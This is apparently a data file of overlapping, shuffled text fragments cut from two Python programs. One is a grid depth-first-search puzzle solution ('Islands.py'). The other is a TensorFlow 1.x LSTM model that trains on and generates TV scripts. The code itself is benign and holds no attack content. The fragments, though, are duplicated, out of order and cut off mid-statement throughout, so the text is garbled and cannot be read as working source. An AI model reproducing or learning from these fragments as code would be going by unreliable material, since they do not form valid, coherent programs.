"Islands.py class Solution: def solve(self, matrix): total = sum(sum(row) for row in matrix)",
"matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc = dfs.pop()",
"seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc",
"in range(len(matrix[0])): if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs",
"sum(sum(row) for row in matrix) escapable = 0 seen = set() for r",
"0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) return",
"r in range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c]",
"range(len(matrix[0])): if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs =",
"not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]:",
"seen = set() for r in range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c)",
"matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c in range(len(matrix[0])):",
"escapable = 0 seen = set() for r in range(len(matrix)): for c in",
"in range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c] !=",
"total = sum(sum(row) for row in matrix) escapable = 0 seen = set()",
"for row in matrix) escapable = 0 seen = set() for r in",
"dfs: cr,cc = dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix)",
"[[r,c]] while dfs: cr,cc = dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]:",
"dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c) in",
"== 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c in range(len(matrix[0])): if",
"while dfs: cr,cc = dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if"
] |
[
"inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self, cell, rnn_size,",
"Loss function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer",
"prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running",
"tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state",
"pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs,",
"probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate,",
"tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss",
"def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with",
"= timeit.default_timer() for epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i,",
"= tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return",
"summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time -",
"new text with prime word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word",
"rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer)",
"tf import timeit import datetime import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] =",
"save_dir, test_every, prime_word, gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:',",
"for grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer =",
"{}, estimated to finish {}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if",
"return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1,",
"tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss def save_trained_model(self, sess,",
"sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary,",
"self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell,",
"final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size",
"= datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss",
"', '(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\")",
"layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32),",
"tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def",
"final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size):",
"embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell,",
"tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm =",
"# Dynamic Input dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0])",
"total_seconds_so_far = last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far",
"get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state",
"= tv_script.replace('( ', '(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor",
"return (fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with",
"-1.0, 1.0), var) for grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries =",
"run_train_epoch(self, sess, batches, learning_rate, epoch_i): return train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver",
"else '' tv_script = tv_script.replace(' ' + token.lower(), key) tv_script = tv_script.replace('\\n ',",
"numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq class",
"{}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far =",
"num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every == 0 or epoch_i ==",
"in ['\\n', '(', '\"'] else '' tv_script = tv_script.replace(' ' + token.lower(), key)",
"= self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script = ' '.join(gen_sentences) for key,",
"gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities, prev_state = sess.run( [test_probs, test_final_state],",
"batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in range(num_epochs): state = sess.run(self.initial_state,",
"'3' from tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None,",
"tokens tv_script = ' '.join(gen_sentences) for key, token in token_dict.items(): ending = '",
"self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def",
"rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size,",
"+ 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every == 0 or",
"or epoch_i == num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word,",
"'(', '\"'] else '' tv_script = tv_script.replace(' ' + token.lower(), key) tv_script =",
"tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count) initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell,",
"tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size,",
"self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size,",
"for key, token in token_dict.items(): ending = ' ' if key in ['\\n',",
"test_every == 0 or epoch_i == num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph)",
"= tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input, p_targets, p_learning_rate)",
"word: {}'.format(prime_word)) test_final_state, test_probs = self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state =",
"self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs()",
"(fully_connected, final_state) def build_model(self, int_to_vocab, rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default():",
"generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new text",
"= tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer",
"= list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every,",
"name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim): embedding = tf.Variable(tf.random_uniform((vocab_size, embed_dim),",
"num_epochs - 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length,",
"feed) print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time =",
"self.input_text: x, self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost,",
".format(epoch_i + 1, num_epochs, train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every == 0",
"per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text:",
"graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in",
"= timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs",
"probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self,",
"in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y) in enumerate(batches):",
"rnn_size, rnn_layer_count, summary_output_dir): self.train_graph = tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets,",
"grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir,",
"probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values())",
"if (epoch_i % save_every == 0 or epoch_i == num_epochs - 1): self.save_trained_model(sess,",
"self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for generating words probs =",
"final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab):",
"= sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch {}', batch_i) summary = sess.run(self.merged_summaries, feed)",
"prev_state = sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab)",
"train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new text with prime",
"vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new text with prime word: {}'.format(prime_word)) test_final_state,",
"sess, token_dict, seq_length): print('Generating new text with prime word: {}'.format(prime_word)) test_final_state, test_probs =",
"as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time =",
"train_loss, total_time_so_far, estimated_to_finish)) if (epoch_i % save_every == 0 or epoch_i == num_epochs",
"= self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for",
"total_time_so_far, estimated_to_finish)) if (epoch_i % save_every == 0 or epoch_i == num_epochs -",
"rnn_size) rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected)",
"get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\") probabilities_tensor = loaded_graph.get_tensor_by_name(\"probs:0\") return (final_state_tensor, probabilities_tensor) def pick_word(self,",
"fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return (fully_connected, final_state) def build_model(self, int_to_vocab,",
"', '\\n') tv_script = tv_script.replace('( ', '(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor",
"import timeit import datetime import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'",
"[(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries",
"gen_sentences = [prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in",
"initial_state = tf.identity(multi_rnn_cell.zero_state(batch_size, tf.float32), name=\"initial_state\") return (multi_rnn_cell, initial_state) def get_embed(self, input_data, vocab_size, embed_dim):",
"sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) #",
"tf.Variable(tf.random_uniform((vocab_size, embed_dim), -1, 1)) return tf.nn.embedding_lookup(embedding, input_data) def build_rnn(self, cell, inputs): outputs, final_state",
"{} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in range(num_epochs): state =",
"<filename>tv-script-generation/full_test/neural_network.py import tensorflow as tf import timeit import datetime import numpy as np",
"initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict, seq_length): print('Generating new text with prime word:",
"list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word,",
"or epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i",
"final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn,",
"None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return",
"- 1): self.save_trained_model(sess, save_dir, epoch_i + 1) if (epoch_i % test_every == 0",
"import seq2seq class NeuralNetwork(): def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets",
"self.get_tensors(train_graph) gen_sentences = [prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n",
"rnn_size, self.input_text, vocab_size) # Probabilities for generating words probs = tf.nn.softmax(logits, name='probs') #",
"= sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time",
"so far {}, estimated to finish {}' .format(epoch_i + 1, num_epochs, train_loss, total_time_so_far,",
"tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape =",
"' if key in ['\\n', '(', '\"'] else '' tv_script = tv_script.replace(' '",
"in token_dict.items(): ending = ' ' if key in ['\\n', '(', '\"'] else",
"state, self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed) print('Ran batch",
"rnn, final_state = self.build_rnn(cell, embed_layer) fully_connected = tf.layers.dense(rnn, units=vocab_size, activation=None) tf.summary.histogram('fully_connected', fully_connected) return",
"save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not",
"sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches per epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for",
"- 1): test_final_state, test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int,",
"seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {} batches per",
"sess, batches, learning_rate, epoch_i): return train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver =",
"tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer =",
"tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess, text_processor.token_dict, seq_length) print(\"*********************************************************************************************\") print(tv_script)",
"print('Model trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int,",
"gen_length, text_processor, seq_length): with tf.Session(graph=self.train_graph) as sess: sess.run(tf.global_variables_initializer()) #print('Train graph:', train_graph.get_operations()) print('Running {}",
"return (outputs, final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size,",
"tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ', '(') return tv_script def get_tensors(self, loaded_graph):",
"feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far =",
"import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq class NeuralNetwork(): def get_inputs(self):",
"def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches,",
"batch_i, (x, y) in enumerate(batches): feed = { self.input_text: x, self.targets: y, self.initial_state:",
"= sess.run(self.initial_state, {self.input_text: batches[0][0]}) for batch_i, (x, y) in enumerate(batches): feed = {",
"= self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state = self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities",
"(p_input, p_targets, p_learning_rate) def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell =",
"Gradient Clipping gradients = optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,",
"name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate = tf.placeholder(tf.float32, name=\"learning_rate\") return (p_input,",
"= datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far)",
"tf.train.Saver() full_save_directory = '{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained",
"= tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\") return (outputs, final_state) def build_nn(self,",
"= tf.Graph() with self.train_graph.as_default(): vocab_size = len(int_to_vocab) self.input_text, self.targets, self.lr = self.get_inputs() input_data_shape",
"saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length, vocab_to_int, int_to_vocab, sess, token_dict,",
"self.build_nn(cell, rnn_size, self.input_text, vocab_size) # Probabilities for generating words probs = tf.nn.softmax(logits, name='probs')",
"feed = { self.input_text: x, self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss, state,",
"= sess.run( [test_probs, test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word)",
"epoch.'.format(len(batches))) all_start_time = timeit.default_timer() for epoch_i in range(num_epochs): state = sess.run(self.initial_state, {self.input_text: batches[0][0]})",
"learning_rate, epoch_i): return train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver() full_save_directory",
"tv_script = tv_script.replace('( ', '(') return tv_script def get_tensors(self, loaded_graph): final_state_tensor = loaded_graph.get_tensor_by_name(\"final_state:0\")",
"p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor, seq_length):",
"test_final_state], {self.input_text: dyn_input, initial_state: prev_state}) pred_word = self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens",
"tv_script.replace(' ' + token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('(",
"batches, learning_rate, epoch_i): return train_loss def save_trained_model(self, sess, save_dir, epoch_number): saver = tf.train.Saver()",
"self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far = last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far)",
"y, self.initial_state: state, self.lr: learning_rate} train_loss, state, _ = sess.run([self.cost, self.final_state, self.train_op], feed)",
"full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph, initial_state, gen_length,",
"(final_state_tensor, probabilities_tensor) def pick_word(self, probabilities, int_to_vocab): to_choose_from = list(int_to_vocab.values()) return np.random.choice(to_choose_from, p=probabilities) def",
"p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None], name=\"input\") p_learning_rate",
"self.pick_word(probabilities[dyn_seq_length-1], int_to_vocab) gen_sentences.append(pred_word) # Remove tokens tv_script = ' '.join(gen_sentences) for key, token",
"batch {}', batch_i) summary = sess.run(self.merged_summaries, feed) self.train_writer.add_summary(summary, epoch_i) last_end_time = timeit.default_timer() total_seconds_so_far",
"test_probs = self.get_tensors(self.train_graph) tv_script = self.generate_test_script(prime_word, self.train_graph, self.initial_state, gen_length, text_processor.vocab_to_int, text_processor.int_to_vocab, sess, text_processor.token_dict,",
"input_data) def build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state =",
"# Loss function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) #",
"= {:.3f}, time so far {}, estimated to finish {}' .format(epoch_i + 1,",
"{ self.input_text: x, self.targets: y, self.initial_state: state, self.lr: learning_rate} train_loss, state, _ =",
"in enumerate(batches): feed = { self.input_text: x, self.targets: y, self.initial_state: state, self.lr: learning_rate}",
"range(gen_length): # Dynamic Input dyn_input = [[vocab_to_int[word] for word in gen_sentences[-seq_length:]]] dyn_seq_length =",
"for word in gen_sentences[-seq_length:]]] dyn_seq_length = len(dyn_input[0]) # Get Prediction probabilities, prev_state =",
"% save_every == 0 or epoch_i == num_epochs - 1): self.save_trained_model(sess, save_dir, epoch_i",
"probs = tf.nn.softmax(logits, name='probs') # Loss function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0],",
"estimated_to_finish)) if (epoch_i % save_every == 0 or epoch_i == num_epochs - 1):",
"+ 1) if (epoch_i % test_every == 0 or epoch_i == num_epochs -",
"import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib import seq2seq",
"def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data, vocab_size, rnn_size) rnn, final_state",
"optimizer.compute_gradients(self.cost) capped_gradients = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad, var in gradients] self.train_op",
"'{}/epoch_{}'.format(save_dir, epoch_number) if not os.path.exists(full_save_directory): os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved to",
"key) tv_script = tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ', '(') return tv_script",
"= self.get_inputs() input_data_shape = tf.shape(self.input_text) cell, self.initial_state = self.get_init_cell(input_data_shape[0], rnn_size, layer_count=rnn_layer_count) logits, self.final_state",
"= last_end_time - all_start_time total_time_so_far = datetime.timedelta(seconds=total_seconds_so_far) estimated_to_finish = datetime.timedelta(seconds=num_epochs * total_seconds_so_far /",
"total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f}, time",
"os.makedirs(full_save_directory) saver.save(sess, full_save_directory) print('Model trained and saved to {}.'.format(full_save_directory)) def generate_test_script(self, prime_word, train_graph,",
"name=\"final_state\") return (outputs, final_state) def build_nn(self, cell, rnn_size, input_data, vocab_size): embed_layer = self.get_embed(input_data,",
"tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss', self.cost) # Optimizer optimizer = tf.train.AdamOptimizer(self.lr) # Gradient Clipping gradients",
"= [prime_word + ':'] prev_state = sess.run(initial_state, {self.input_text: np.array([[1]])}) for n in range(gen_length):",
"np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length, text_processor,",
"= tv_script.replace(' ' + token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n') tv_script =",
"def get_init_cell(self, batch_size, rnn_size, layer_count=2): basic_lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size) multi_rnn_cell = tf.contrib.rnn.MultiRNNCell([basic_lstm] * layer_count)",
"def build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state,",
"def get_inputs(self): p_input = tf.placeholder(tf.int32, [None, None], name=\"input\") p_targets = tf.placeholder(tf.int32, [None, None],",
"tf.nn.softmax(logits, name='probs') # Loss function self.cost = seq2seq.sequence_loss( logits, self.targets, tf.ones([input_data_shape[0], input_data_shape[1]])) tf.summary.scalar('train_loss',",
"* total_seconds_so_far / (epoch_i + 1) - total_seconds_so_far) print('Epoch {:>3}/{} train_loss = {:.3f},",
"return np.random.choice(to_choose_from, p=probabilities) def train_model(self, batches, num_epochs, learning_rate, save_every, save_dir, test_every, prime_word, gen_length,",
"import datetime import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' from tensorflow.contrib",
"token.lower(), key) tv_script = tv_script.replace('\\n ', '\\n') tv_script = tv_script.replace('( ', '(') return",
"build_rnn(self, cell, inputs): outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, dtype=tf.float32) final_state = tf.identity(final_state, name=\"final_state\")",
"gradients] self.train_op = optimizer.apply_gradients(capped_gradients) self.merged_summaries = tf.summary.merge_all() self.train_writer = tf.summary.FileWriter(summary_output_dir, graph=self.train_graph) def run_train_epoch(self,",
"int_to_vocab, sess, token_dict, seq_length): print('Generating new text with prime word: {}'.format(prime_word)) test_final_state, test_probs",
"= ' '.join(gen_sentences) for key, token in token_dict.items(): ending = ' ' if",
